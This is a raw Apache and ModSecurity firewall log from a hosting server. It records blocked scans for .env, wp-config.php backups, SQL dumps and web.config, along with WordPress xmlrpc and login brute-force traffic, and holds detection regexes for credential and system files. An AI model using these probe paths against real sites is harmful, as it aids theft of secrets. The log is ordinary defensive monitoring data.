[Tue May 26 13:30:21.025407 2026] [security2:error] [pid 512745:tid 512966] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/website/.env"] [unique_id "ahVTFXKSB_s2CvZg7xNuXgAAAWU"]
[Tue May 26 13:30:21.060066 2026] [security2:error] [pid 512745:tid 512907] [client 45.148.10.95:19546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahVTFXKSB_s2CvZg7xNuXwAAASo"]
[Tue May 26 13:30:21.067832 2026] [security2:error] [pid 512344:tid 512567] [client 45.148.10.95:5128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.bak"] [unique_id "ahVTFcbElyei4S77DQcHQAAAAF0"]
[Tue May 26 13:30:21.078437 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:5282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.new"] [unique_id "ahVTFXKSB_s2CvZg7xNuYAAAAVI"]
[Tue May 26 13:30:21.087797 2026] [security2:error] [pid 512745:tid 512938] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahVTFXKSB_s2CvZg7xNuYQAAAUk"]
[Tue May 26 13:30:21.118982 2026] [security2:error] [pid 512344:tid 512536] [client 45.148.10.95:5174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/wp-content/mysql.sql"] [unique_id "ahVTFcbElyei4S77DQcHQgAAAD4"]
[Tue May 26 13:30:23.110161 2026] [security2:error] [pid 512344:tid 512547] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTFsbElyei4S77DQcHVQAAAEk"]
[Tue May 26 13:30:23.340022 2026] [security2:error] [pid 512344:tid 512564] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTFsbElyei4S77DQcHVAAAWhg"]
[Tue May 26 13:30:23.605706 2026] [security2:error] [pid 512745:tid 513000] [client 216.75.132.173:21392] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.gciamd.org.in"] [uri "/theorder/06_St Lawrence the Martyr.jpg"] [unique_id "ahVTF3KSB_s2CvZg7xNutAAAAWI"]
[Tue May 26 13:30:25.143849 2026] [security2:error] [pid 512745:tid 512902] [client 185.191.171.1:25050] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahVTGXKSB_s2CvZg7xNuyAAAASU"]
[Tue May 26 13:30:25.143954 2026] [security2:error] [pid 512745:tid 512902] [client 185.191.171.1:25050] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahVTGXKSB_s2CvZg7xNuyAAAASU"]
[Tue May 26 13:30:25.470935 2026] [security2:error] [pid 512745:tid 512888] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTGXKSB_s2CvZg7xNuxwAAARc"]
[Tue May 26 13:30:26.024562 2026] [security2:error] [pid 512745:tid 512965] [client 95.70.131.179:63281] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVTGXKSB_s2CvZg7xNu1QAAAWQ"]
[Tue May 26 13:30:26.706654 2026] [security2:error] [pid 512344:tid 512560] [client 139.180.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTGsbElyei4S77DQcHlAAAAFY"], referer: https://www.anujtradingco.com/
[Tue May 26 13:30:27.526358 2026] [security2:error] [pid 512745:tid 512932] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTG3KSB_s2CvZg7xNu6wAAAUM"]
[Tue May 26 13:30:28.731401 2026] [security2:error] [pid 512745:tid 512971] [client 8.217.191.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVTG3KSB_s2CvZg7xNu6AAAAWo"]
[Tue May 26 13:30:29.015759 2026] [security2:error] [pid 512745:tid 512888] [client 123.28.225.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTHHKSB_s2CvZg7xNvAwAAARc"]
[Tue May 26 13:30:29.174657 2026] [security2:error] [pid 512745:tid 512935] [client 139.180.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTHXKSB_s2CvZg7xNvFwAAAUY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230906&moderation-hash=ba033614e47bbe413fcd130609457956
[Tue May 26 13:30:29.465265 2026] [security2:error] [pid 512745:tid 512970] [client 91.196.152.249:50643] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.prototypecommune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVTHHKSB_s2CvZg7xNvBQAAAWk"]
[Tue May 26 13:30:29.925225 2026] [security2:error] [pid 512745:tid 512993] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTHXKSB_s2CvZg7xNvHQAAAYA"]
[Tue May 26 13:30:30.754840 2026] [security2:error] [pid 512745:tid 512963] [client 46.151.24.148:54010] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVTHnKSB_s2CvZg7xNvMgAAAWI"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 13:30:31.997125 2026] [security2:error] [pid 512344:tid 512541] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTH8bElyei4S77DQcH0gAAAEM"]
[Tue May 26 13:30:33.964138 2026] [security2:error] [pid 512745:tid 512900] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTIXKSB_s2CvZg7xNvSQAAASM"]
[Tue May 26 13:30:34.210201 2026] [security2:error] [pid 512745:tid 512911] [client 139.180.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTInKSB_s2CvZg7xNvVgAAAS4"], referer: https://anujtradingco.com
[Tue May 26 13:30:35.723256 2026] [security2:error] [pid 512745:tid 512826] [remote 95.216.117.13:43322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTI3KSB_s2CvZg7xNvagABMVA"]
[Tue May 26 13:30:35.854712 2026] [security2:error] [pid 512745:tid 512921] [client 40.77.167.0:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "nicmaperu.com"] [uri "/index.php"] [unique_id "ahVTI3KSB_s2CvZg7xNvbQAAATg"]
[Tue May 26 13:30:36.320228 2026] [proxy:error] [pid 512344:tid 512523] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:36.320290 2026] [proxy_http:error] [pid 512344:tid 512523] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:36.320941 2026] [proxy:error] [pid 512344:tid 512523] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:36.320993 2026] [proxy_http:error] [pid 512344:tid 512523] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:36.535760 2026] [security2:error] [pid 512745:tid 512992] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTJHKSB_s2CvZg7xNvdQAAAX8"]
[Tue May 26 13:30:37.103782 2026] [proxy:error] [pid 512344:tid 512563] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:37.103869 2026] [proxy_http:error] [pid 512344:tid 512563] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.ndequipments.com/
[Tue May 26 13:30:37.104513 2026] [proxy:error] [pid 512344:tid 512563] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:37.104546 2026] [proxy_http:error] [pid 512344:tid 512563] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.ndequipments.com/
[Tue May 26 13:30:38.362962 2026] [proxy:error] [pid 512344:tid 512418] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:38.363039 2026] [proxy_http:error] [pid 512344:tid 512418] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:38.363661 2026] [proxy:error] [pid 512344:tid 512418] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:38.363721 2026] [proxy_http:error] [pid 512344:tid 512418] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:38.403220 2026] [security2:error] [pid 512344:tid 512505] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTJcbElyei4S77DQcIGwAAAB8"]
[Tue May 26 13:30:39.048051 2026] [security2:error] [pid 512344:tid 512431] [remote 167.172.25.98:39958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTJsbElyei4S77DQcIJAAAGVY"]
[Tue May 26 13:30:39.398301 2026] [fcgid:warn] [pid 512344:tid 512597] (70014)End of file found: [client 66.132.195.117:21586] mod_fcgid: can't get data from http client
[Tue May 26 13:30:40.318637 2026] [proxy:error] [pid 512745:tid 512774] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:40.318699 2026] [proxy_http:error] [pid 512745:tid 512774] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.ndequipments.com/
[Tue May 26 13:30:40.319416 2026] [proxy:error] [pid 512745:tid 512774] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:40.319451 2026] [proxy_http:error] [pid 512745:tid 512774] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.ndequipments.com/
[Tue May 26 13:30:40.331212 2026] [security2:error] [pid 512344:tid 512481] [client 95.70.131.179:63234] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVTJ8bElyei4S77DQcIMAAAAAc"]
[Tue May 26 13:30:40.331347 2026] [security2:error] [pid 512344:tid 512481] [client 95.70.131.179:63234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVTJ8bElyei4S77DQcIMAAAAAc"]
[Tue May 26 13:30:40.902033 2026] [security2:error] [pid 512344:tid 512518] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTKMbElyei4S77DQcIOgAAACw"]
[Tue May 26 13:30:43.376248 2026] [security2:error] [pid 512745:tid 512933] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTKnKSB_s2CvZg7xNvwwAAAUQ"]
[Tue May 26 13:30:45.632690 2026] [security2:error] [pid 512745:tid 512892] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTLXKSB_s2CvZg7xNv1QAAARs"]
[Tue May 26 13:30:47.663693 2026] [security2:error] [pid 512745:tid 512971] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTL3KSB_s2CvZg7xNv7AAAAWo"]
[Tue May 26 13:30:49.750463 2026] [security2:error] [pid 512344:tid 512455] [remote 95.70.131.179:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTMcbElyei4S77DQcIqwAAH24"]
[Tue May 26 13:30:49.750740 2026] [security2:error] [pid 512344:tid 512505] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTMcbElyei4S77DQcIqwAAH24"]
[Tue May 26 13:30:50.027298 2026] [security2:error] [pid 512344:tid 512578] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTMcbElyei4S77DQcIpgAAAGg"]
[Tue May 26 13:30:50.745826 2026] [security2:error] [pid 512745:tid 512914] [client 91.92.42.63:64972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "jkjuice.taotechservices.com"] [uri "/web.config"] [unique_id "ahVTMnKSB_s2CvZg7xNwKAAAATE"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.771855 2026] [security2:error] [pid 512745:tid 512990] [client 91.92.42.63:65002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "jkjuice.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVTMnKSB_s2CvZg7xNwLAAAAX0"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.792051 2026] [security2:error] [pid 512745:tid 513001] [client 91.92.42.63:64948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/database.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwJgAAAYg"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.808973 2026] [security2:error] [pid 512745:tid 512945] [client 91.92.42.63:64958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/settings.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwJwAAAVA"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.814815 2026] [security2:error] [pid 512745:tid 512979] [client 91.92.42.63:64940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/db.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwKQAAAXI"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.896976 2026] [security2:error] [pid 512344:tid 512524] [client 91.92.42.63:65048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/db.php"] [unique_id "ahVTMsbElyei4S77DQcIxwAAADI"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.914944 2026] [security2:error] [pid 512344:tid 512542] [client 91.92.42.63:65066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/settings.php"] [unique_id "ahVTMsbElyei4S77DQcIyAAAAEQ"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.921154 2026] [security2:error] [pid 512745:tid 512969] [client 91.92.42.63:65052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/web.config"] [unique_id "ahVTMnKSB_s2CvZg7xNwMwAAAWg"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.947976 2026] [security2:error] [pid 512344:tid 512571] [client 91.92.42.63:65074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/database.php"] [unique_id "ahVTMsbElyei4S77DQcIywAAAGE"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.980060 2026] [security2:error] [pid 512344:tid 512514] [client 91.92.42.63:65096] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVTMsbElyei4S77DQcIzgAAACg"], referer: http://taotechservices.com/
[Tue May 26 13:30:51.316044 2026] [security2:error] [pid 512745:tid 512887] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwLwAAARY"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:51.316904 2026] [security2:error] [pid 512745:tid 512919] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwLgAAATY"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:51.355362 2026] [security2:error] [pid 512745:tid 512915] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwJQAAATI"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:52.412897 2026] [security2:error] [pid 512344:tid 512598] [client 146.174.177.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTM8bElyei4S77DQcI0gAAAHw"]
[Tue May 26 13:30:52.717842 2026] [security2:error] [pid 512745:tid 512893] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTM3KSB_s2CvZg7xNwRAAAARw"]
[Tue May 26 13:30:54.449900 2026] [security2:error] [pid 512745:tid 512966] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTNnKSB_s2CvZg7xNwZgAAAWU"]
[Tue May 26 13:30:55.577612 2026] [security2:error] [pid 512745:tid 512930] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTNnKSB_s2CvZg7xNwdAABQVc"]
